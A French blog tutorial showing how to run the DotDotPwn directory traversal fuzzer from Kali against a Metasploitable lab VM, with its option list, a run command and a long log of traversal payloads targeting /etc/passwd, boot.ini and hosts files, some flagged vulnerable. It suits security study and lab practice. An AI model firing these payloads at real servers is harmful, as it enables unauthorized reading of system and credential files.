Tools - DotDotPown
Alasta 27 Mars 2016 tools bash Linux tools Open Source kali Security collecte shell
Description : Nous allons voir comment utiliser DotDotPwn qui est un fuzzer de vulnérabilités de type traversal directory.
Rappel :
Attention dans cet article l’outils est utilisé pour la recherche et l’apprentissage. Ce type d’outils ne doit pas être utilisé vers un serveur qui ne vous appartient pas, ceci peut être puni par la loi (voir les articles 323-XX).
Environnement de test :
Pour cela nous allons utiliser une VM tournant sur la distribution Kali et une VM Metasploitable Server (cible) qui est un serveur ayant des vulnérabilités pour faire des démos.
Voici un schéma :
DotDotPwn
Kali embarque par défaut DotDotpwn. Les modules de fuzzing supportés sont :
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload
- STDOUT
Utilisation
Options
root@kali:~# dotdotpwn.pl
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
Available options:
-m Module [http | http-url | ftp | tftp | payload | stdout]
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix" or "generic")
-s Service version detection (banner grabber)
-d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
-f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
-E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
-S Use SSL - for HTTP and Payload module (use https:// for in url for http-uri)
-u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-t Time in milliseconds between each test (default: 300 (.3 second))
-X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
-e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
-U Username (default: 'anonymous')
-P Password (default: 'dot@dot.pwn')
-M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
-r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
-b Break after the first vulnerability is found
-q Quiet mode (doesn't print each attempt)
-C Continue if no data was received from hostExemple du module HTTP
Lancement du script sur notre serveur metasploitable en HTTP.
root@kali:~# dotdotpwn.pl -m http -h 192.168.5.11 -M GET
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/192.168.5.11_03-27-2016_21-23.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.5.11
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
--SNiP--
[*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fpasswd <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fissue <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252fboot.ini <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fissue <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fboot.ini <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!
[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
^C
[+] Total Traversals found: 160
[-] Fuzz testing aborted
[+] Report saved: Reports/192.168.5.11_03-27-2016_21-23.txtNous voyions que le script fait du fuzzing sur les mêmes patterns en essayant différent encodages.
Du fait que nous n’avons pas spécifié l’OS (option -o unix pour notre cas) il teste les patterns, windows, unix, …
J’émets juste une réserve sur les retours avec VULNERABLE, c’est juste le fait que le serveur lui renvoie un status code HTTP 200, cela dépends de la configuration du serveur Web.
Bonus :
Dans le fichier /usr/share/dotdotpwn/DotDotPwn/TraversalEngine.pm vous trouverez les fichiers rechercher par le fuzzing (il est donc possible d’en ajouter) et l’encodage des slashs et point.
Dans le dossier, il y a le code des différents modules.